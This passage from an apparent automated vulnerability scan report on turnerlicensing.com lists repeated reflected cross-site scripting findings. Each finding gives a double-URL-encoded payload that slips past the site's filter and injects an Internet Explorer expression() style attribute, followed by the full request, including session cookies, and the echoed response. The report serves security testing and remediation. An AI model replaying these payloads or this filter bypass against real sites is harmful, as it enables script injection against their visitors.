The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8303b'style='x:expression(alert(1))'fa4a56a0150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_christmas_cards?8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:02 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2002010489:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=886
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 97041


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Christmas Cards</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175954&8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150=1&8303b'style='x:expression(alert(1))'fa4a56a0150=1&8303b%27style%3d%27x%3aexpression%28alert%281%29%29%27fa4a56a0150=1&fromsla=T'>
...[SNIP]...

2.244. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_deluxe_journals

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba999'style='x:expression(alert(1))'d367c03018a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_deluxe_journals?ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:03 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1146969885:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99853


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Deluxe Journals</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
//www.turnerlicensing.com/s.nl?category=175957&ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a=1&ba999%27style%3d%27x%3aexpression%28alert%281%29%29%27d367c03018a=1&ba999'style='x:expression(alert(1))'d367c03018a=1&fromsla=T'>
...[SNIP]...

2.245. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_frequently_asked_questions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e4b5'style='x:expression(alert(1))'c1c6aa6bced in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_frequently_asked_questions?7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:52 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1590872232:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=741
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 44105


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Frequently Asked Questions</title>


<script language='JavaScript' type='text/javascript'>window.st
...[SNIP]...
.turnerlicensing.com/s.nl?it=I&id=77&7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced=1&7e4b5%27style%3d%27x%3aexpression%28alert%281%29%29%27c1c6aa6bced=1&fromsla=T&7e4b5'style='x:expression(alert(1))'c1c6aa6bced=1'>
...[SNIP]...

2.246. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_mini_wall_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 511bd'style='x:expression(alert(1))'e16792023be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_mini_wall_calendars?511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:02 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1146969928:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=691
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99826


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Mini Wall Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
//www.turnerlicensing.com/s.nl?category=338456&511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be=1&511bd%27style%3d%27x%3aexpression%28alert%281%29%29%27e16792023be=1&511bd'style='x:expression(alert(1))'e16792023be=1&fromsla=T'>
...[SNIP]...

2.247. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_notebooks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1dc3'style='x:expression(alert(1))'ff1d101c939 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_notebooks?b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2002010872:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=902
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100220


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Notebooks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175959&b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939=1&b1dc3'style='x:expression(alert(1))'ff1d101c939=1&fromsla=T&b1dc3%27style%3d%27x%3aexpression%28alert%281%29%29%27ff1d101c939=1'>
...[SNIP]...

2.248. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_payment_options

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6ff'style='x:expression(alert(1))'e20c6c92743 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_payment_options?1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:52 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 334661099:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=912
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 34203


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Payment Options</title>


<script language='JavaScript' type='text/javascript'>window.status='Loadi
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?it=I&id=79&1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743=1&1b6ff'style='x:expression(alert(1))'e20c6c92743=1&1b6ff%27style%3d%27x%3aexpression%28alert%281%29%29%27e20c6c92743=1&fromsla=T'>
...[SNIP]...

2.249. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_privacy_security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa83d'style='x:expression(alert(1))'495e2755ee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_privacy_security?aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:51 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1558107999:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=771
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 37621


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Privacy & Security</title>


<script language='JavaScript' type='text/javascript'>window.status='Lo
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?it=I&id=80&aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9=1&aa83d'style='x:expression(alert(1))'495e2755ee9=1&aa83d%27style%3d%27x%3aexpression%28alert%281%29%29%27495e2755ee9=1&fromsla=T'>
...[SNIP]...

2.250. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_puzzles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15822'style='x:expression(alert(1))'e24cf7166ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_puzzles?15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:04 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -109237774:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=967
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99435


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Puzzles</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175963&15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad=1&15822'style='x:expression(alert(1))'e24cf7166ad=1&15822%27style%3d%27x%3aexpression%28alert%281%29%29%27e24cf7166ad=1&fromsla=T'>
...[SNIP]...

2.251. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_returns_exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 440f0'style='x:expression(alert(1))'ca6e7ba9e71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_returns_exchanges?440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:54 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 772670871:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=969
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 35161


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Returns & Exchanges</title>


<script language='JavaScript' type='text/javascript'>window.status='L
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=81&440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71=1&440f0%27style%3d%27x%3aexpression%28alert%281%29%29%27ca6e7ba9e71=1&440f0'style='x:expression(alert(1))'ca6e7ba9e71=1&fromsla=T'>
...[SNIP]...

2.252. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_shipping_information

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88d10'style='x:expression(alert(1))'7e7db22553f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_shipping_information?88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:54 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114207881:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=994
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 36834


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Shipping Information</title>


<script language='JavaScript' type='text/javascript'>window.status='
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=82&88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f=1&88d10%27style%3d%27x%3aexpression%28alert%281%29%29%277e7db22553f=1&88d10'style='x:expression(alert(1))'7e7db22553f=1&fromsla=T'>
...[SNIP]...

2.253. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
